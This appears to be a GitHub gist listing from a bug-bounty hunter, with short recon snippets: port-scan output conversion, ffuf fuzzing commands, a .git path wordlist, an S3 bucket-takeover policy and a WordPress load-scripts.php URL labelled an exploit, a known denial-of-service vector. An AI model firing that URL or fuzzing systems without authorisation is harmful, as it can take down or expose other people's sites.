remonsec
/ rustscan-converter.sh
Created
October 25, 2023 09:20
A Bash script for reformatting RustScan greppable output into a usable line-by-line text file, ideal for integration with other tools.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Usage | |
| # bash rustscan-converter.sh ports.txt | |
| # Check if the input file exists | |
| if [ ! -f "$1" ]; then | |
| echo "Input file '$1' not found." | |
| exit 1 | |
| fi |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| file=$1 | |
| for target in $(cat $file): | |
| do http OPTIONS $target -h --verify=no | grep "Allow:" && echo $target$'\n' | |
| done | |
| ### | |
| # ======================= |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ===[ Start Fuzzing ]=== | |
| ffuf -w common.txt:FUZZ -w ~/bb/target/httpx.txt:URL -u URLFUZZ -mc 200 -of csv -o ffuf-result.txt | |
| ===[ See The Result ]=== | |
| cat ffuf-result.txt | awk -F ',' '{print $3}' | |
| N.B: My wordlist have '/' at beginning | |
| Example: /.git | |
| If your wordlist start with '.git' |
remonsec
/ filter-domains
Created
March 10, 2021 21:11
filter subdomain 3rd level domain and so and so on
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| for i in $(cat scope.txt);do echo $i | tr -cd . | wc -c > word.txt; [[ $(cat word.txt) -le 1 ]] && echo $i;done |
remonsec
/ .git endpoints
Created
February 8, 2021 17:52
.git endpoint may help you to improve your fuzz wordlist
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| .git/COMMIT_EDITMSG | |
| .git/description | |
| .git/hooks/applypatch-msg.sample | |
| .git/hooks/pre-applypatch-msg.sample | |
| .git/hooks/pre-rebase.sample | |
| .git/hooks/commit-msg.sample | |
| .git/hooks/post-commit.sample | |
| .git/hooks/post-receive.sample | |
| .git/hooks/post-update.sample | |
| .git/hooks/pre-applypatch.sample |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cat urls.txt | awk -F[/:] '{print $4}' | sed 's/www.//' | |
| cat urls.txt | cut -d'/' -f3 | sed 's/www.//' |
remonsec
/ Golang_bashrc
Last active
January 3, 2024 21:38
bashrc setup for golang. put it on your bashrc and source it
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| export PATH=$PATH:/usr/local/go/bin | |
| export PATH=$PATH:$HOME/go/bin | |
| export GOPATH=$HOME/go |
remonsec
/ s3ToverPolicy
Created
August 9, 2020 15:43
This is the bucket policy of takeover AWS s3 bucket
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "Version": "2012-10-17", | |
| "Statement": [ | |
| { | |
| "Sid": "PublicReadGetObject", | |
| "Effect": "Allow", | |
| "Principal": { | |
| "AWS": "*" | |
| }, | |
| "Action": "s3:GetObject", |
remonsec
/ loadsxploit
Last active
March 8, 2023 13:59
This is the Full URL to exploit /wp-admin/load-scripts.php
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /wp-admin/load-scripts.php?load=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-se |